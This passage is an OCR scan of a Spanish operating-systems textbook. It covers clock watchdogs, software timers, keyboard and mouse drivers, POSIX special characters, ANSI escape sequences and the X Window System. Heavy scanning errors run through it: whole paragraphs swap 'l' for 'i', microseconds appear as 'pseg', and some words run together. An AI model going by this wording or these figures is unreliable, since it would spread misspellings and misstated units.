El mecanismo utilizado por el software controlador del reloj para manejar temporizadores guar¬ 
dianes es igual que para las señales de usuario. La única diferencia es que cuando un temporizador 
se desactiva, en vez de producir una señal, el software controlador de reloj llama a un procedimien¬ 
to proporcionado por el que hizo la llamada. El procedimiento es parte del código del proceso que 
hizo la llamada. El procedimiento al que se llamó puede hacer lo que sea necesario, incluso hasta 
producir una interrupción, aunque dentro del kernel las interrupciones son a menudo inconvenientes 
y las señales no existen. Esta es la razón por la que se proporciona el mecanismo del guardián. Vale 
la pena observar que este mecanismo sólo funciona cuando el software controlador de reloj y el pro¬ 
cedimiento que se va a llamar se encuentran en el mismo espacio de direcciones. 

Lo último en nuestra lista es el perfil amiento. Algunos sistemas operativos proporcionan un 
mecanismo mediante el cual un programa de usuario puede hacer que el sistema construya un his- 
tograma de su contador del programa, para poder ver en dónde pasa su tiempo. Cuando el perfila- 
miento es una posibilidad, en cada pulso el controlador comprueba si se está perfilando el proceso 
actual y, de ser así, calcula el número de receptáculo (un rango de direcciones) que corresponde al 
contador del programa actual. Después incrementa ese receptáculo en uno. Este mecanismo tam¬ 
bién se puede utilizar para perfilar al mismo sistema. 
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5.5.3 Temporizadores de software 

La mayoría de las computadoras tienen un segundo reloj programadle que se puede establecer pa¬ 
ra producir interrupciones del temporizador, a cualquier velocidad que requiera un programa. Este 
temporizador es aparte del temporizador principal del sistema, cuyas funciones se describieron en 
la sección anterior. M ientras que la frecuencia de interrupción sea baja, no habrá problema al usar 
este segundo temporizador para fines específicos de la aplicación. El problema surge cuando la fre¬ 
cuencia del temporizador específico de la aplicación es muy alta. A continuación analizaremos de 
manera breve un esquema de un temporizador basado en software que funciona bien bajo ciertas 
circunstancias, inclusive a frecuencias mucho mayores. La idea se debe a A ron y Druschel (1999). 
Para obtener más detalles, consulte su artículo. 

En general hay dos formas de manejar las interrupciones de E/S y el sondeo. Las interrupcio¬ 
nes tienen baja latencia; es decir, ocurren justo después del evento en sí, con muy poco o nada de 
retraso. Por otra parte, con las CPUs modernas las interrupciones tienen una sobrecarga considera¬ 
ble, debido a la necesidad del cambio de contexto y su influencia en la canalización, el TLB y la 
caché. 

L a alternativa para las interrupciones es hacer que la aplicación sondee el evento que espera por 
sí misma. Al hacer esto se evitan las interrupciones, pero puede haber una latencia considerable de¬ 
bido a que puede ocurrir un evento directamente después de un sondeo, en cuyo caso espera casi to¬ 
do un intervalo desondeo. En promedio, la latencia equivale a la mitad del intervalo desondeo. 

Para ciertas aplicaciones, no es aceptable la sobrecarga de las interrupciones ni la latencia del 
sondeo. Por ejemplo, considere una red de alto rendimiento como Gigabit Ethernet. Esta red es ca¬ 
paz de aceptar o enviar un paquete de tamaño completo cada 12 pseg. Para ejecutarse con un ren¬ 
dimiento óptimo en la salida, debe enviarse un paquete cada 12 pseg. 

U na forma de lograr esta velocidad es hacer que al completarse la transmisión de un paquete, se 
produzca una interrupción o se establezca el segundo temporizador para que produzca una interrup¬ 
ción cada 12 pseg. El problema es que al medir esta interrupción en un Pentium II de 300 M Hz, tar¬ 
da 4.45 pseg (A ron y Druschel, 1999). Esta sobrecarga apenas si es mejor que la de las computadoras 
en la década de 1970. Por ejemplo, en la mayoría de las mi ni computadoras una interrupción reque¬ 
ría cuatro ciclos: para poner el contador del programa y el PSW en la pila y para cargar un nuevo 
contador de programa y PSW. Actualmente, al lidiar con la línea de tuberías, la M M U, el TLB y la 
caché, aumenta la sobrecarga en forma considerable. Es probable que estos efectos empeoren en vez 
de mejorar con el tiempo, cancelando así las velocidades mayores de reloj. 

Los temporizadores de software evitan las interrupciones. Envezdeello, cadavezqueel ker- 
nel se ejecuta por alguna otra razón, justo antes de regresar al modo de usuario comprueba el reloj 
de tiempo real para ver si ha expirado un temporizador de software. Si el temporizador ha expira¬ 
do, se realiza el evento programado (por ejemplo, transmitir paquetes o comprobar si llegó un pa¬ 
quete), sin necesidad de cambiar al modo de kernel debido a que el sistema ya se encuentra ahí. U na 
vez realizado el trabajo, el temporizador de software se restablece para empezar de nuevo. Todo lo 
que hay que hacer es copiar el valor actual del reloj en el temporizador y sumarle el intervalo de 
tiempo de inactividad. 

Los temporizadores de software marcan o descienden con la velocidad a la que se realizan en¬ 
tradas en el kernel por otras razones. Estas razones son: 
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1. Llamadas al sistema. 

2. Fallos del TLB. 

3. Fallos de página. 

4. Interrupciones de E/S. 

5. La CPU queda inactiva. 

Para ver con qué frecuencia ocurrían estos eventos, A ron y Druschel realizaron mediciones con va¬ 
rias cargas de la CPU, incluyendo un servidorWeb con carga completa, un servidor Web con un tra¬ 
bajo en segundo plano para realizar cálculos, la reproducción de audio en tiempo real en Internet, y 
la recompilación del kernel de UN IX. La velocidad de entrada promedio en el kernel tuvo una varia¬ 
ción de 2 pseg a 18 pseg, donde casi la mitad de estas entradas eran llamadas al sistema. Así, para 
una aproximación de primer orden, es viable hacer que un temporizador de software se active cada 
12 pseg, aunque fallando en un tiempo límite en ocasiones. Para las aplicaciones como el envío de 
paquetes o el sondeo de paquetes entrantes, tener un retraso de 10 pseg de vez en cuando es mejor 
que tener interrupciones que ocupen 35% de la CPU. 

Desde luego que habrá periodos en los que no haya llamadas al sistema, fallos del TLB o de 
página, en cuyo caso no se activarán temporizadores. Para colocar un límite superior en estos inter¬ 
valos, se puede establecer el segundo temporizador de hardware para que se active cada 1 mseg, por 
ejemplo. Si la aplicación puede sobrevivir con sólo 1000 paquetes/seg por intervalos ocasionales, 
entonces la combinación de temporizadores de software y un temporizador de hardware de baja fre¬ 
cuencia puede ser mejor que la E/S controlada sólo por interrupciones o por sondeo. 


5.6 INTERFACES DE USUARIO: 

TECLADO, RATÓN, MONITOR 

Toda computadora de propósito general tiene un teclado y un monitor (y por lo general un ratón) pa¬ 
ra permitir que las personas interactúen con ella. Aunque el teclado y el monitor son dispositivos téc¬ 
nicamente separados, trabajan muy de cerca. En los mainframescon frecuencia hay muchos usuarios 
remotos, cada uno con un dispositivo que contiene un teclado y una pantalla conectados como una 
unidad. Estos dispositivos se conocen históricamente como terminales. Con frecuencia, las perso¬ 
nas siguen utilizando ese término, aun cuando hablan sobre los teclados y monitores de las compu¬ 
tadoras personales (en gran parte debido a que no hay otro mejor). 

5.6.1 Software de entrada 

La entrada del usuario proviene principalmente del teclado y del ratón; analicemos estos dispositi¬ 
vos. En una computadora personal, el teclado contiene un microprocesador integrado que por lo ge¬ 
neral se comunica, a través de un puerto serial especializado, con un chip controlador en la tarjeta 
principal (aunque cada vez con más frecuencia, los teclados se conectan a un puerto USB). Se ge- 
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ñera una interrupción cada vez que se oprime una tecia, y se genera una segunda interrupción cada 
vez quesesueita. En cada una de estas interrupciones de teciado, ei software controiador dei mismo 
extrae i a información acerca de i o que ocurre desde ei puerto de E/S asociado con ei teciado. Todo 
io demás ocurre en ei software y es muy independiente dei hardware. 

La mayoría dei resto de esta sección se puede comprender mejor si se considera que se escri¬ 
ben comandos en una ventana de sheii (interfaz de iínea de comandos). Así es como trabajan co¬ 
múnmente ios programadores. A continuación anaiizaremos ias interfaces gráficas. 

Software de teclado 

Ei número en ei puerto de E/S es ei número de tecia, conocido como código de exploración, no ei 
código ASCII. Los teclados tienen menos de 128 teclas, por lo que sólo se necesitan 7 bits para re¬ 
presentare! número de tecla. El octavo bit se establece en 0 cuando se oprime una tecla, y en 1 cuan¬ 
do se suelta. Es responsabilidad del controlador llevaron registro del estado de cada tecla (oprimida 
o suelta). 

Por ejemplo, cuando se oprime la tecla A el código de exploración (30) se coloca en un regis¬ 
tro de E/S. Es responsabilidad del controlador determinar si es minúscula, mayúscula, CTRL-A, 
ALT-A, CTRL-ALT-A o alguna otra combinación. Como el controlador puede saber qué teclas se 
han oprimido y todavía no se han liberado (por ejemplo, M AY ÚS), ti ene suficiente información pa¬ 
ra realizar el trabajo. 

Por ejemplo, la secuencia de teclas 

OPRIMIR MAYÚS, OPRIMIR A, SOLTAR A, SOLTAR MAYÚS 
indica una A mayúscula. Sin embargo, la secuencia de teclas 

OPRIMIR MAYÚS, OPRIMIR A, SOLTAR MAYÚS, SOLTAR A 

indica también una A mayúscula. Aunque esta interfaz de teclado pone toda la carga en el softwa¬ 
re, es en extremo flexible. Por ejemplo, los programas de usuario pueden querer saber si un dígito 
que se acaba de escribir provino de la fila superior de teclas, o del teclado numérico lateral. En prin¬ 
cipio, el controlador puede proporcionar esta información. 

Se pueden adoptar dos filosofías posibles para el controlador. En la primera, el trabajo del con¬ 
trolador es sólo aceptar la entrada y pasarla hacia arriba sin modificarla. Un programa que lee del 
teclado obtiene una secuencia pura de códigos ASCII (dar a los programas de usuario los códigos 
de exploración es demasiado primitivo, y se genera una alta dependencia del teclado). 

Esta filosofía se adapta bien a las necesidades de los editores de pantalla sofisticados como 
emacs, que permite al usuario enlazar una acción arbitraria a cualquier carácter o secuencia de ca¬ 
racteres. Sin embargo, significa que si el usuario escribe dste en vez de date y luego corrige el error 
oprimiendo tres veces la tecla retroceso y ate, seguido de un retorno de carro, el programa de usua¬ 
rio recibirá los 11 códigos ASCII que se teclearon, de la siguiente manera: 

dste_ateCR 

No todos los programas desean tanto detalle. A menudo sólo quieren la entrada corregida y no 
la secuencia exacta sobre cómo se produjo. Esta observación conlleva a la segunda filosofía: el con- 
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trolador maneja toda la edición entre iíneas, y envía sóio ias iíneas corregidas a ios programas de 
usuario. La primera fiiosofía está orientada a caracteres: ia segunda está orientada a iíneas. En un 
principio se conocieron como modo crudo y modo cocido, respectivamente. Ei estándar POSIX 
utiiiza ei término modo canónico para describir ei modo orientado a iíneas. Ei modo no canónico 
es equivaiente ai modo crudo, aunque es posibie cambiar muchos detaiies dei comportamiento. Los 
sistemas compatibies con POSIX proporcionan varias funciones de bibiioteca posibiiitan ia seiec- 
ción de uno de esos modos y se pueden modificar muchos parámetros. 

Si ei teciado está en modo canónico (cocido), ios caracteres se deben aimacenar hasta que se 
haya acumuiado una iínea compieta, debido a que tai vez ei usuario decida posteriormente borrar 
parte de eiia. Inciuso si ei teciado está en modo crudo, ei programa tai vez no haya soi icitado entra¬ 
da todavía, por io que ios caracteres se deben coiocar en un búfer para permitir la escritura adeian- 
tada. Se puede utiiizar un búfer dedicado o se pueden asignar búferes de una reserva. Ei primer 
método impone un i imite fijo en ia escritura adeiantada; ei segundo no. Esta cuestión surge con más 
fuerza cuando ei usuario escribe en una ventana de sheii (ventana de iínea de comandos en Win¬ 
dows) y acaba de emitir un comando (como una compiiación) que no se ha compietado todavía. Los 
siguientes caracteres que se escriban tienen que coiocarse en un búfer, debido a que ei sheii no es¬ 
tá iisto para ieerios. Los diseñadores de sistemas que no permiten a ios usuarios escribir por adeian- 
tado deberían ser bañados con brea y empiumados, o peor aún, ser obiigados a utiiizar su propio 
sistema. 

Aunque ei teciado y ei monitor son dispositivos iógicamente separados, muchos usuarios han 
crecido acostumbrados a ver ios caracteres que acaban de escribir aparecer en ia pantaiia. A este 
proceso se ie conoce como producir eco (echo). 

La producción dei eco se compiica debido ai hecho de que un programa puede estar escribien¬ 
do en ia pantaiia mientras ei usuario teciea (de nuevo, piense en escribir en una ventana de sheii). 
Cuando menos, ei controiador dei teciado tiene que averiguar dónde coiocar ia nueva entrada sin 
que sea sobrescrita por ia saiida dei programa. 

La producción de eco también se compiica cuando hay que mostrar más de 80 caracteres 
en una ventana con iíneas de 80 caracteres (o aigún otro número). Dependiendo de ia apiicación, 
puede ser apropiado que ios caracteres se ajusten a i a siguiente iínea. Ai gunos controi adores sim- 
pi emente truncan ias iíneas a 80 caracteres, ai descartar todos ios caracteres más ai i á de i a coium- 
na 80. 

Otro probiema es ei manejo de iostabuiadores. Por io generai es responsabiiidad dei controia¬ 
dor caicuiar ia posición dei cursor, tomando en cuenta tanto ia saiida de ios programas como ia sa¬ 
iida debido ai eco, y caicuiar ei número apropiado de espacios que se van a imprimir con eco. 

Ahora iiegamos ai probiema de ia equivaiencia de dispositivos. Lógicamente, ai finai de una 
iínea de texto queremos un retorno de carro, para despiazar ei cursor de vueita a ia coiumna 1, y un 
avance de iínea para pasar a ia siguiente iínea. No sería muy atractivo requerir que ios usuarios es¬ 
cribieran ambos caracteres ai finai de cada iínea. Es responsabiiidad dei controiador de dispositivo 
convertir io que iiegue como entrada en ei formato utiiizado por ei sistema operativo. En UNIX, ia 
tecia INTRO se convierte en un avance de página para su aimacenamiento interno: en Windows se 
convierte en un retorno de carro seguido de un avance de iínea. 

Si ia forma estándar es sóio aimacenar un avance de iínea (ia convención de UNIX), entonces 
los retornos de carro (creados por la tecla Intro) se deben convertir en avances de línea. Si el for- 
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mato interno es almacenar ambos (la convención de Windows), entonces el controlador debe gene¬ 
rar un avance de línea cuando reciba un retorno de carro, y un retorno de carro cuando obtenga un 
avance de línea. Sin importar cuál sea la convención interna, el monitor puede requerir que se pro¬ 
duzca eco tanto de un avance de línea como un retorno de carro para poder actualizar la pantalla de 
manera apropiada. En los sistemas multiusuario como las mainframes, distintos usuarios pueden te¬ 
ner distintos tipos de terminales conectadas y es responsabilidad del controlador del teclado con¬ 
vertir todas las distintas combinaciones de retorno de carro/avance de línea en el estándar interno 
del sistema, y encargarse de que todo el eco se produzca correctamente. 

Cuando se opera en modo canónico, algunos caracteres de entrada tienen significado especial. 
La figura 5-35 muestra todos los caracteres especiales requeridos por POSIX. Los valores predeter¬ 
minados son todos caracteres de control que no deben estar en conflicto con la entrada de texto o 
los códigos utilizados por los programas: todos excepto los últimos dos se pueden cambiar bajo el 
control del programa. 


Carácter 

Nombre POSIX 

Comentario 

CTRL-H 

ERASE 

Retrocede un carácter 

CTRL-U 

KILL 

Borra toda la línea que se está escribiendo 

CTRL-V 

LNEXT 

Interpreta el siguiente carácter literalmente 

CTRL-S 

STOP 

Detiene la salida 

CTRL-Q 

START 

Inicia la salida 

DEL 

INTR 

Proceso de interrupción (SIGINT) 

CTRL-\ 

QUIT 

Obliga un vaciado de núcleo (SIGOLIIT) 

CTRL-D 

EOF 

Fin de archivo 

CTRL-M 

CR 

Retorno de carro (no se puede modificar) 

CTRL-J 

NL 

Avance de línea (no se puede modificar) 


Figura 5-35. Caracteres que se manejan de manera especial en modo canónico. 


El carácter ERASE permite al usuario borrar el carácter que acaba de escribir. Por lo general 
es el carácter de retroceso (CTRL-FI). No se agrega a la cola de caracteres, sino que elimina el ca¬ 
rácter anterior de la cola. Su eco se debe producir como una secuencia de tres caracteres — retro¬ 
ceso, espacio y retroceso— para poder eliminar el carácter anterior de la pantalla. Si el carácter 
anterior era un tabulador, poder borrarlo depende de la manera en que se procesó cuando se escri¬ 
bió. Si se expande de inmediato en espacios, se necesita cierta información adicional para deter¬ 
minar cuánto hay que retroceder. Si el mismo tabulador se almacena en la cola de entrada, se puede 
eliminar y sólo se imprime toda la línea completa de nuevo. En la mayoría de los sistemas, la te¬ 
cla retroceso sólo borra caracteres en la línea actual. No borrará un retorno de carro y retrocederá 
hasta la línea anterior. 

Cuando el usuario detecta un error al principio de la línea que está escribiendo, a menudo es 
conveniente borrar toda la línea y empezar de nuevo. El carácter KILL borra toda la línea. La ma- 
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yoría de los sistemas hacen que la línea borrada desaparezca de la pantalla, pero unos cuantos más 
antiguos producen su eco además de un retorno de carro y un avance de línea, ya que a algunos 
usuarios les gusta ver la línea anterior. En consecuencia, la forma de producir el eco de KILL es 
cuestión de gusto. Al igual que con ERASE, por lo general no es posible regresar más allá de la lí¬ 
nea actual. Cuando se elimina un bloque de caracteres, tal vez sea conveniente o no que el softwa¬ 
re controlador devuelva los búferes a la reserva, si es que se utilizan. 

Algunas veces los caracteres ERASE oKILL se deben introducir como datos ordinarios. El ca- 
rácterLNEXT sirve como un carácter deescape. En UNIX, CTRL-V es el predeterminado. Como 
ejemplo, los sistemas UNIX anteriores utilizaban a menudo el signo @ para KILL, pero el sistema 
de correo de Internet utiliza direcciones de la forma linda@cs.washington.edu. Alguien que se sien¬ 
ta más cómodo con las convenciones antiguas podría redefinir a KILL como @, pero entonces ten¬ 
dría que introducir literalmente un signo @ para utilizar el correo electrónico. Para ello se puede 
escribir CTRL-V @. El carácter CTRL-V en sí se puede introducir literalmente al escribir CTRL-V 
CTRL-V. Después de ver un CTRL-V, el software controlador establece una bandera que indica que 
el siguiente carácter está exento de un procesamiento especial. El carácter LN EXT en sí no se intro¬ 
duce en la cola de caracteres. 

Para permitir que los usuarios eviten que una imagen de pantalla se salga de la vista, se pro¬ 
porcionan códigos de control para congelar la pantalla y reiniciarla posteriormente. En UN IX, es¬ 
tos códigos son STOP, (CTRL-S) y START, (CTRL-Q), respectivamente. No se almacenan pero 
se utilizan para establecer y borrar una bandera en la estructura de datos del teclado. Cada vez 
que se intenta una operación de salida, se inspecciona la bandera. Si está activada, no se lleva a 
cabo la operación de salida. Por lo general, el eco también se suprime junto con la salida del pro¬ 
grama. 

A menudo es necesario eliminar un programa fugitivo que se está depurando. Para este fin se 
pueden utilizar los caracteres INTR (SUPR) y QU IT (CTRL-\). En UNIX, SUPR envía la señal Sl- 
GINT a todos los procesos que inician a partir de ese teclado. Implementar SUPR puede ser algo 
engañoso, ya que UNIX se diseñó desde un principio para manejar varios usuarios a la vez. Por en¬ 
de, en el caso general puede haber muchos procesos ejecutándose a beneficio de muchos usuarios, y 
la tecla SUPR sólo debe señalar a los procesos de ese usuario. La parte difícil es llevar la informa¬ 
ción del controlador a la parte del sistema que se encarga de las señales, la que después de todo, no 
ha pedido esta información. 

CTRL-\ es similar a SUPR, excepto porque envía la señal SIGQUIT, queobliga a realizar un 
vaciado del núcleo si no se atrapa o se ignora. Cuando se oprime una de estas teclas, el controla¬ 
dor debe producir el eco de un retorno de carro y un avance de línea, y descartar toda la entrada 
acumulada para permitir empezar desde cero. El valor predeterminado para INTR es a menudo 
CTRL-C en vez de SUPR, ya que muchos programas utilizan SUPR en lugar de retroceso para 
editar. 

Otro carácter especial esEOF (CTRL-D), que en UNIX hace que se cumpla cualquier petición 
de lectura pendiente para la terminal con los datos que estén disponibles en el búfer, incluso aun¬ 
que esté vacío. Al escribir CTRL-D al inicio de una línea el programa obtiene una lectura de 0 by- 
tes, que por convención se interpreta como fin de archivo y ocasiona que la mayoría de los 
programas actúen como si hubieran visto el fin de archivo en un archivo de entrada. 
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Software de ratón 

La mayoría de las PCs tienen un ratón, o algunas veces un trackball, que sencillamente es un ratón 
boca arriba. Un tipo común de ratón tiene una bola de goma en su interior que se asoma por un ho¬ 
yo en la parte inferior y gira, a medida que el ratón se desplaza por una superficie dura, frotándose 
contra unos rodillos posicionados en ejes ortogonales. El movimiento en la dirección este-oeste ha¬ 
ce que gire el eje paralelo al eje y; el movimiento en la dirección norte-sur hace que gire el eje pa¬ 
ralelo al ejex. 

Otro tipo popular de ratón es el óptico, que está equipado con uno o más diodos emisores de 
luz y fotodetectores en su parte inferior. Los primeros tenían que operar sobre un tapete especial 
grabado con una rejilla rectangular, de manera que el ratón pudiera contar las líneas que cruza¬ 
ba. Los ratones ópticos modernos tienen un chip de procesamiento de imágenes en ellos y sacan 
fotos continuas de baja resolución de la superficie debajo de ellos, buscando cambios de imagen 
en imagen. 

Cada vez que un ratón se ha desplazado cierta distancia mínima en cualquier dirección, o cuan¬ 
do se oprime o suelta un botón, se envía un mensaje a la computadora. La distancia mínima es de 
aproximadamente 0.1 mm (aunque se puede establecer mediante software). Algunas personas lla¬ 
man a esta unidad mickey. Los ratones pueden tener uno, dos o tres botones, dependiendo de la es¬ 
timación de los diseñadores en cuanto a la habilidad intelectual de los usuarios para llevar la cuenta 
de más de un botón. A Igunos ratones tienen ruedas que pueden enviar datos adicionales a la compu¬ 
tadora. Los ratones inalámbricos son iguales a los alámbricos, excepto que en vez de devolver sus 
datos a la computadora a través de un cable, utilizan radios de baja energía, por ejemplo mediante 
el uso del estándar Bluetooth. 

El mensaje para la computadora contiene tres elementos: Ax, Ay, botones. El primer elemento 
es el cambio en la posición x desde el último mensaje. Después viene el cambio en la posición y 
desde el último mensaje. Por último, se incluye el estado de los botones. El formato del mensaje de¬ 
pende del sistema y del número de botones que tenga el ratón. Por lo general, requiere de 3 bytes. 
La mayoría de los ratones se reportan con la computadora un máximo de 40 veces/seg, por lo que 
el ratón se puede haber desplazado varios mickeys desde el último reporte. 

Observe que el ratón indica sólo los cambios en la posición, no la posición absoluta en sí. Si se 
recoge el ratón y se coloca de nuevo en su posición gentil mente sin hacer que la bola gire, no se en¬ 
viarán mensajes. 

Algunas GUIs diferencian un solo clic y un doble clic de un botón del ratón. Si dos clics están 
lo bastante cerca en el espacio (mickeys) y también en el tiempo (milisegundos), se señala un do¬ 
ble clic. El valor máximo para "lo bastante cerca" depende del software, y por lo general el usua¬ 
rio puede ajustar ambos parámetros. 

5.6.2 Software de salida 

Ahora consideremos el software de salida. Primero analizaremos una salida de ejemplo a una ven¬ 
tana de texto, que es lo que los programadores prefieren utilizar comúnmente. Después considera¬ 
remos las interfaces gráficas de usuario, que otros usuarios prefieren a menudo. 
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Ventanas de texto 

La salida es más simple que la entrada cuando se envía secuencialmente en un solo tipo de letra, ta¬ 
maño y color. En su mayor parte, el programa envía caracteres a la ventana en uso y se muestran 
ahí. Por lo general, un bloque de caracteres (por ejemplo, una línea) se escribe en una llamada al 
sistema. 

Los editores de pantalla y muchos otros programas sofisticados necesitan la capacidad de ac¬ 
tualizar la pantalla en formas complejas, como sustituir una línea a mitad de la pantalla. Para satis¬ 
facer esta necesidad, la mayoría de los controladores de software de salida proporcionan una serie 
decomandos para desplazar el cursor, insertary eliminar caractereso líneas en el cursor, entre otras 
tareas. A menudo estos comandos se conocen como secuencias de escape. En los días de la termi¬ 
nal "tonta" ASCII de 25 x 80 había cientos de ti pos de terminal es, cada una con sus propias secuen¬ 
cias de escape. Como consecuencia, era difícil escribir software que funcionara en más de un tipo 
terminal. 

Una solución que se introdujo en Berkeley UNIX fue una base de datos de terminales cono¬ 
cida como termcap. Este paquete de software definía una variedad de acciones básicas, como des¬ 
plazar el cursor hacia (fila, columna). Para desplazar el cursor a una ubicación específica, el 
software (como un editor) utilizaba una secuencia de escape genérica que después se convertía en 
la secuencia de escape actual para la terminal en la que se estaba escribiendo. De esta forma, el 
editor funcionaba en cualquier terminal que tuviera una entrada en la base de datos termcap. La 
mayoría del software de UNIX aún funciona de esta manera, incluso en las computadoras perso¬ 
nales. 

En cierto momento, la industria vio la necesidad de estandarizar la secuencia de escape, por lo 
que se desarrolló un estándarANSI. En la figura 5-36 se muestran unos cuantos valores. 

Considere cómo estas secuencias de escape podrían ser utilizadas por un editor de texto. Su¬ 
ponga que el usuario escribe un comando indicando al editor que elimine toda la línea 3 y después 
cierre el hueco entre las líneas 2 y 4. El editor podría enviar la siguiente secuencia de escape sobre 
la línea serial a la terminal: 

ESC [ 3 ; 1 H ESC [0 K ESC [1M 

(donde los espacios se utilizan sólo para separar los símbolos: no se transmiten). Esta secuencia des¬ 
plaza el cursor al principio de la línea 3, borra toda la línea y luego elimina la línea ahora vacía, con 
lo cual provoca que todas las líneas que empiezan en 5 se desplacen una línea hacia arriba. Enton¬ 
ces la que era la línea 4 se convierte en la línea 3; la línea 5 se convierte en la línea 4, y así en lo 
sucesivo. Es posible utilizar secuencias de escape análogas para agregar texto a la parte media de 
la pantalla. Las palabras se pueden agregar o eliminar de manera similar. 

El sistemaX Window 

Casi todos los sistemas UNIX basan su interfaz de usuario en el Sistema X Window (que a menu¬ 
do sólo se le llama X), desarrollado en el M .I.T. como parte del proyecto Athena en la década de 
1980. Es muy portátil y se ejecuta por completo en espacio de usuario. En un principio tenía como 
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Secuencia de escape 

Significado 

ESC[nA 

Se desplaza n líneas hacia arriba 

ESC [ nB 

Se desplaza n líneas hacía abajo 

ESC[nC 

Se desplaza n espacios a la derecha 

ESC [ nD 

Se desplaza n espacios a la izquierda 

E S C [ m; n H 

Desplaza el cursor a (m, n) 

ESC [ sj 

Borra la pantalla del cursor (0 al final, 1 del inicio, 2 todo) 

ESC [ s K 

Borra la línea del cursor (0 al final, 1 al inicio, 2 todo) 

ESC[nL 

Inserta n líneas en el cursor 

ESC [ nM 

Elimina n líneas en el cursor 

ESC[nP 

Elimina «caracteres en el cursor 

ESC [ n@ 

Inserta «caracteres en el cursor 

ESC[n m 

Habilita la reproducción «{0=normal, 4=negritas, 5=parpadeo, 7=inverso) 

ESC M 

Desplaza la pantalla hacia atrás si el cursor está en la línea superior 


Figura 5-36. Las secuencias deescapeANSI aceptadas por el software controlador de 
terminal en la salida. ESC denota el carácter de escapeASCII (OxlB) y n, m y s son pa¬ 
rámetros numéricos opcionales. 


propósito principal conectar un gran número de terminales de usuario remotas con un servidor de 
cómputo central, por lo que está dividido lógicamente en software cliente y software servidor, que 
puede ejecutarse potencialmenteen distintas computadoras. En la mayoría de las computadoras mo¬ 
dernas, ambas partes se pueden ejecutar en el mismo equipo. En los sistemas Linux, los populares 
entornos de escritorio Gnomey KDE se ejecutan encima deX. 

Cuando X se ejecuta en un equipo, el software que recolecta la entrada del teclado y el ratón, 
y que escribe la salida en la pantalla, se llama servidor X. Este software tiene que llevar el regis¬ 
tro de cuál ventana está seleccionada en un momento dado (dónde se encuentra el ratón), para sa¬ 
ber a qué cliente debe enviar cualquier entrada nueva del teclado. Se comunica con los programas 
en ejecución (posiblemente a través de una red), llamados clientes X. Les envía la entrada del ra¬ 
tón y del teclado, y acepta los comandos de pantalla de ellos. 

Puede parecer extraño que el servidor X siempre esté dentro de la computadora del usuario, 
mientras que el cliente X puede estar en un servidor de cómputo remoto, pero sólo piense en el tra¬ 
bajo principal del servidor X: mostrar bits en la pantalla, por lo cual tiene sentido que esté cerca del 
usuario. Desde el punto de vista del programa, es un cliente que le dice al servidor que haga cosas, 
como mostrar texto y figuras geométricas. El servidor (en la PC local) hacejusto lo que se le dice, 
al igual que todos los servidores. 

El arreglo de cliente y servidor se muestra en la figura 5.37 para el caso en el que el cliente 
X y el servidor X se encuentran en distintos equipos. Pero al ejecutar Gnome o K DE en un solo 
equipo, el cliente es sólo un programa de aplicación que utiliza la biblioteca X y habla con el ser¬ 
vidor X en el mismo equipo (pero usando una conexión TCP sobre sockets, igual que en el caso 
remoto). 
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Host remoto 


Espacio , 
de usuario' 


Espacio 
de kernei' 


Administrador 
de ventana 

Programa 
de aplicación 

Motif 

Intrinsics 

Xiib 

Ciiente X 


UNIX 


Hardware 



Protocoio X 


Ventana 




ServidorX 


UNIX 


Hardware 





Red 


Figura 5-37. Clientes y servidores en el Sistema X Window del M.I.T. 


La razón por la que es posible ejecutar el Sistema X Window encima de UNIX (o de cualquier 
otro sistema operativo) en una sola máquina o a través de una red, es que lo queX define en reali¬ 
dad es el protocolo X entre el cliente X y el servidor X, como se muestra en la figura 5-37. No im¬ 
porta si el cliente y el servidor están en el mismo equipo, separados por 100 metros a través de una 
red de área local o miles de kilómetros aparte y conectados por Internet. El protocolo y la opera¬ 
ción del sistema es idéntico en todos los casos. 

X es sólo un sistema de ventanas: no es una GUI completa. Para obtener una GUI completa, se 
ejecutan otras capas de software encima. Una de estas capas es Xlib, un conjunto de procedimien¬ 
tos de biblioteca para accederá la funcionalidad deX. Estos procedimientos forman la base del Sis¬ 
tema X Window y son lo que examinaremos a continuación, pero son demasiado primitivos como 
para que la mayoría de los programas de usuario los utilicen de manera directa. Por ejemplo, cada 
clic del ratón se reporta por separado, así que el proceso para determinar que dos clics en realidad 
forman un doble clic se tiene que manejar arriba de Xlib. 

Para facilitar la programación con X, se suministra un kit de herramientas como parte deX que 
consiste en Intrinsics. Este nivel maneja botones, barras de desplazamiento y otros elementos de la 
GUI, conocidos como widgets. Para crear una verdadera interfaz de GUI con una apariencia visual 
uniforme, se necesita otro nivel más (o varios de ellos). Un ejemplo es Motif, que se muestra en la 
figura 5-37 y forma la base del Entorno de Escritorio Común utilizado en Solaris y otros sistemas 
UN IX comerciales. La mayoría de las aplicaciones hacen uso de llamadas a M otif en vez de a X lib. 
Gnome y KDE tienen una estructura similar a la de la figura 5-37, sólo que con distintas bibliote¬ 
cas. Gnome utiliza la biblioteca GTK -i- y KDE utiliza la biblioteca Qt. El caso de que tener dos 
GUIssea mejor que una puede debatirse. 
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También vale la pena recalcar que la administración de ventanas no es parte de X. La decisión 
de omitir esta característica fue completamente intencional. Envezdeello, un proceso separado del 
cliente X, conocido como administrador de ventana, controla la creación, eliminación y movi¬ 
miento de las ventanas en la pantalla. Para administrar las ventanas, envía comandos al servidor X 
para indicarle lo que debe hacer. A menudo se ejecuta en la misma máquina que el cliente X, pero 
en teoría se puede ejecutar en cualquier parte. 

Este diseño modular, que consiste en varios niveles y programas, hace a X altamente portátil y 
flexible. Se ha llevado a la mayoría de las versiones de UN IX, incluyendo Solaris, todas las vari an¬ 
tes deBSD,AIX, Linux, etcétera, de tal forma que los desarrolladores de aplicaciones pueden uti¬ 
lizar una interfaz de usuario estándar para varias plataformas. También se ha llevado a otros 
sistemas operativos. Por el contrario, en Windows los sistemas de ventanas y de GUI están mezcla¬ 
dos en la GDI y se encuentran en el kernel, lo cual hace que sean más difíciles de mantener y, des¬ 
de luego, no son portátiles. 

Ahora vamos a analizar brevemente a X desde el nivel deXIib. Cuando se inicia un programa 
de X, abre una conexión a uno o más servidores X, que vamos a llamar estaciones de trabajo, aun 
cuando se podrían colocar en el mismo equipo que el programa X en sí. X considera que esta co¬ 
nexión es confiable en cuanto a que los mensajes perdidos y duplicados se manejan mediante el 
software de red y no tiene que preocuparse por los errores de comunicación. Por lo general se uti¬ 
liza TCP/IP entre el clientey el servidor. 

Pasan cuatro tipos de mensajes a través de la conexión: 

1. Comandos de dibujo del programa a la estación de trabajo. 

2. Respuestas de la estación de trabajo a las solicitudes del programa. 

3. M ensajes del teclado, del ratón y de otros eventos. 

4. M ensajes de error. 

La mayoría de los comandos de dibujo se envían del programa a la estación de trabajo como 
